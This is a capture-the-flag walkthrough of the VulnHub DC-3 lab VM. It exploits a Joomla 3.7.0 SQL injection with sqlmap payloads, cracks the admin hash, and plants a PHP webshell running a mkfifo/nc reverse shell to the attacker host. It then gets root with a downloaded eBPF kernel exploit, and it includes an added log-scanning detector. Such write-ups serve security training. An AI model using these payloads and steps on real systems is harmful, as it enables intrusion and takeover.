
VulnHub-DC: 3

Posted: 2023-03-17 09:13:44

Target machine: https://www.vulnhub.com/entry/dc-32,312/

I. Identify the target

Goal: there is only one flag, one entry point and no clues at all.

II. Information gathering

1. Host discovery

Scan the local network to find the target's IP (arp-scan is much faster than nmap for this).

arp-scan -l |grep 192.168.11

┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1   00:50:56:c0:00:08       VMware, Inc.
192.168.11.1   00:50:56:fe:d0:93       VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7       VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6       VMware, Inc.

Target IP: 192.168.11.140

2. Port scan

Use nmap to scan all ports with service and OS detection.

nmap -A -Pn -p0-65535 192.168.11.140

┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.11.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds

3. Service discovery

The target only exposes a web service on port 80, running the Joomla CMS.

4. Web path brute-forcing

dirsearch -u 192.168.11.140 -e '*' -x 403

(The `*` has to be quoted, otherwise the shell expands it to the file names in the current directory; the run below shows `Extensions: admin` for exactly that reason, since a file named admin existed in the working directory.)

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403

_|. _ _ _ _ _ _|_   v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006

Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt

Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log

Target: http://192.168.11.140/

[09:43:26] Starting:
[09:43:28] 200 -   18KB - /LICENSE.txt                                      
[09:43:29] 200 -   4KB - /README.txt                                      
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 -   2KB - /administrator/includes/                          
[09:43:31] 200 -   31B - /administrator/cache/                            
[09:43:31] 200 -   5KB - /administrator/                                  
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 -   31B - /administrator/logs/                              
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/              
[09:43:32] 200 -   31B - /bin/                                            
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/          
[09:43:32] 200 -   31B - /cache/                                          
[09:43:32] 200 -   31B - /cli/                                            
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 -   31B - /components/
[09:43:33] 200 -   0B - /configuration.php                                
[09:43:35] 200 -   3KB - /htaccess.txt                                    
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/        
[09:43:35] 200 -   31B - /images/                                          
[09:43:35] 200 -   31B - /includes/                                        
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/    
[09:43:35] 200 -   7KB - /index.php                                        
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/    
[09:43:36] 200 -   31B - /layouts/                                        
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/  
[09:43:36] 200 -   31B - /libraries/                                      
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/          
[09:43:36] 200 -   31B - /media/                                          
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/      
[09:43:37] 200 -   31B - /modules/                                        
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/      
[09:43:38] 200 -   31B - /plugins/                                        
[09:43:39] 200 - 836B - /robots.txt.dist                                  
[09:43:41] 200 -   31B - /templates/                                      
[09:43:41] 200 -   0B - /templates/system/                                
[09:43:41] 200 -   31B - /templates/index.html                            
[09:43:41] 200 -   0B - /templates/beez3/                                
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/  
[09:43:41] 200 -   0B - /templates/protostar/                            
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/              
[09:43:41] 200 -   31B - /tmp/                                            
[09:43:42] 200 -   2KB - /web.config.txt                                  

Task Completed

Reading /robots.txt.dist reveals the back-end login page http://192.168.11.140/administrator/

/templates/beez3/ and /templates/protostar/ are presumably the template directories.

5. Web reconnaissance

The home page states that the box has only one flag and that getting it requires root.

6. Vulnerability discovery

Scan with joomscan, the Joomla-specific scanner.

joomscan -u http://192.168.11.140/


  ____ _____ _____ __ __ ___   ___   __   _ _
  (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)(   )(_)( )(_)( )   ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                      (1337.today)

  --=[OWASP JoomScan
  +---++---==[Version : 0.0.7
  +---++---==[Update Date : [2018/09/23]
  +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
  --=[Code name : Self Challenge
  @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.11.140/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.11.140/                                                                      

This gives the basic Joomla information, including the version (3.7.0).

Use searchsploit to check whether a public exploit exists for this version.

searchsploit Joomla 3.7.0

┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                             | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                 | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                             | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is one SQL injection and one XSS; the SQL injection is clearly the more likely route to the administrator credentials and the back end.

III. Vulnerability analysis

Locate and open php/webapps/42033.txt.

locate php/webapps/42033.txt

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
  Type: boolean-based blind
  Title: Boolean-based blind - Parameter replace (DUAL)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

  Type: error-based
  Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

The document says to run sqlmap with the given command to enumerate the database.

IV. Exploitation

1. SQL injection

1.1 Enumerate databases

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

The joomladb database is found.

1.2 Enumerate tables

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks   |
| #__banners         |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments   |
| #__bsms_locations   |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series     |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers   |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics     |
| #__bsms_update     |
| #__categories       |
| #__contact_details |
| #__content_frontpag |
| #__content_rating   |
| #__content_types   |
| #__content         |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups   |
| #__fields_values   |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens   |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages       |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules         |
| #__newsfeeds       |
| #__overrider       |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas         |
| #__session         |
| #__tags             |
| #__template_styles |
| #__ucm_base         |
| #__ucm_content     |
| #__ucm_history     |
| #__update_sites_ext |
| #__update_sites     |
| #__updates         |
| #__user_keys       |
| #__user_notes       |
| #__user_profiles   |
| #__user_usergroup_m |
| #__usergroups       |
| #__users           |
| #__utf8_conversion |
| #__viewlevels       |
+---------------------+

The #__users table is found.

1.3 Enumerate columns

Notes:

  • When sqlmap asks whether to use the common column existence check, answer y manually; just pressing Enter through every prompt will not recover the columns.

  • Press Enter to accept the default wordlist “/usr/share/sqlmap/data/txt/common-columns.txt”

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

The id, name, password and username columns are found.

1.4 Dump the column contents

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]

Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+

The password is stored as a hash (the $2y$ prefix indicates bcrypt).

2. Cracking the hash

2.1 Save the hash

Save the hash to a file named admin.

vi admin

┌──(root㉿kali)-[~]
└─# vi admin

┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

2.2 Crack it with john

Note: the hash had already been cracked once at this point, so the result is displayed with the show option.

john admin

john -show admin

┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy

1 password hash cracked, 0 left

The cracked result is: snoopy

Username: admin

Password: snoopy

2.3 Log in to the back end

The credentials log in successfully to the administration back end at http://192.168.11.140/administrator/

3. File upload

3.1 Upload the file

Once in the back end, upload a webshell by editing a template.

Extensions --> Templates --> Templates

Either template works; here the Beez3 template is edited.

Create a webshell named shell.php in the template's html directory (create, then save), with the following content:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>

3.2 Reverse shell

To trigger the webshell its URL must be known. The earlier path brute-force revealed the template directories; since the beez3 template was used, the path should be:

http://192.168.11.140/templates/beez3/

That returns a blank page; given the template's exposed directory layout, try http://192.168.11.140/templates/beez3/html

The uploaded shell.php is listed there. Start a listener on Kali:

nc -lvnp 6666

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...

Browse to shell.php:

http://192.168.11.140/templates/beez3/html/shell.php

The connection comes back and we have a shell.

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$
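From the defender's side, both steps above leave distinctive traces in the web server's access log. The following Python scanner is an added example, not part of the original write-up: it flags com_fields requests whose list[fullordering] value is not a plain column ordering (the CVE-2017-8917 injection used in section III) and direct requests for PHP files under /templates/ (the template-edited webshell from 3.1 and 3.2). The log lines, the log layout and the "benign ordering" regex are constructed assumptions, not Joomla's own whitelist.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache common log format (constructed assumption about the log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# What a benign Joomla list[fullordering] value looks like: a column name,
# optionally followed by ASC/DESC (e.g. "a.ordering ASC").  Quotes, parentheses
# and SQL function calls fail this pattern.  Heuristic, not Joomla's whitelist.
ORDERING_OK = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)

# Constructed sample log lines, modelled on the requests made in this write-up.
SAMPLE_LOG = """\
192.168.11.128 - - [16/Mar/2023:09:43:28 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.id%20ASC HTTP/1.1" 200 7210
192.168.11.128 - - [16/Mar/2023:10:01:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1203
192.168.11.128 - - [16/Mar/2023:10:01:05 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 7210
192.168.11.128 - - [16/Mar/2023:11:20:44 +0800] "GET /templates/beez3/html/shell.php HTTP/1.1" 200 0
192.168.11.128 - - [16/Mar/2023:11:20:50 +0800] "GET /templates/beez3/css/template.css HTTP/1.1" 200 4120
"""


def check_line(line):
    """Return a list of (indicator, detail) tuples for one log line; [] if benign."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed log line", line.strip())]
    target = urlparse(m.group("target"))
    params = parse_qs(target.query)  # also percent-decodes the values
    findings = []
    # Indicator 1: CVE-2017-8917 abuses list[fullordering] in com_fields.
    if params.get("option") == ["com_fields"]:
        for value in params.get("list[fullordering]", []):
            if not ORDERING_OK.match(value):
                findings.append(("CVE-2017-8917 ordering injection", value))
    # Indicator 2: template PHP files are included by Joomla's front controller,
    # never requested directly, so a direct hit is a webshell candidate.
    path = target.path.lower()
    if path.startswith("/templates/") and path.endswith(".php"):
        findings.append(("direct PHP request under /templates/", target.path))
    return findings


def scan(log_text):
    """Scan a whole log; returns [(ip, status, indicator, detail), ...]."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        ip, status = (m.group("ip"), m.group("status")) if m else ("?", "?")
        for indicator, detail in check_line(line):
            hits.append((ip, status, indicator, detail))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s %s %-40s %s" % hit)
```

Run against a real access log (`scan(open(path).read())`) the second indicator also catches the blank-page probe of the html directory only if it ends in .php, so pair it with directory-listing alerts for /templates/.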

V. Privilege escalation

The root home directory is not accessible, so the next step is to escalate privileges.

$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root

1. Obtain the exploit

A note on the lsb_release command:

LSB stands for Linux Standard Base; lsb_release prints the LSB information for the specific Linux distribution (distributor, release, codename).

Note: a minimal CentOS install does not include this command by default; the package providing lsb_release has to be installed first.

1.1 Check the kernel and distribution

uname -a

lsb_release -a

$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

1.2 Search for kernel vulnerabilities

Search for kernel exploits matching Ubuntu 16.04 LTS with kernel 4.4.0-21-generic.

searchsploit 4.4. Ubuntu 16.04

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt

1.3 Locate and view the file

locate linux/local/39772.txt

vi /usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt

1.4 Download the exploit

The last line of the file gives the exploit download link.

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”

39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s

2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])

2. Transfer the exploit to the target

Start an HTTP server on Kali.

python -m http.server 8888

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

On the target, download 39772.zip into /tmp.

cd /tmp

wget 192.168.11.128:8888/39772.zip

$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

0K ...... 100% 1.92G=0s

2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root

3. Local privilege escalation

Next, unpack, compile and run the exploit to obtain root.

3.1 Unpack the exploit

Unzip 39772.zip, enter the 39772 directory, then extract exploit.tar to obtain the ebpf_mapfd_doubleput_exploit directory.

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar

3.2 Run the exploit

  • The exploit files lack execute permission, so grant it first.

  • Enter the ebpf_mapfd_doubleput_exploit directory.

  • Run compile.sh to build the exploit.

  • Run the compiled doubleput binary.

  • The message we have root privs now... confirms that root was obtained.

ls -Rl ebpf_mapfd_doubleput_exploit

chmod -R 777 ebpf_mapfd_doubleput_exploit

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Privilege escalation succeeded.

VI. Post-exploitation (find the flag)

The flag is in root's home directory.

cd /root

cat the-flag.txt

cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

That completes the box. Game over OVO

From: https://www.cnblogs.com/HKalpa/p/17225373.html
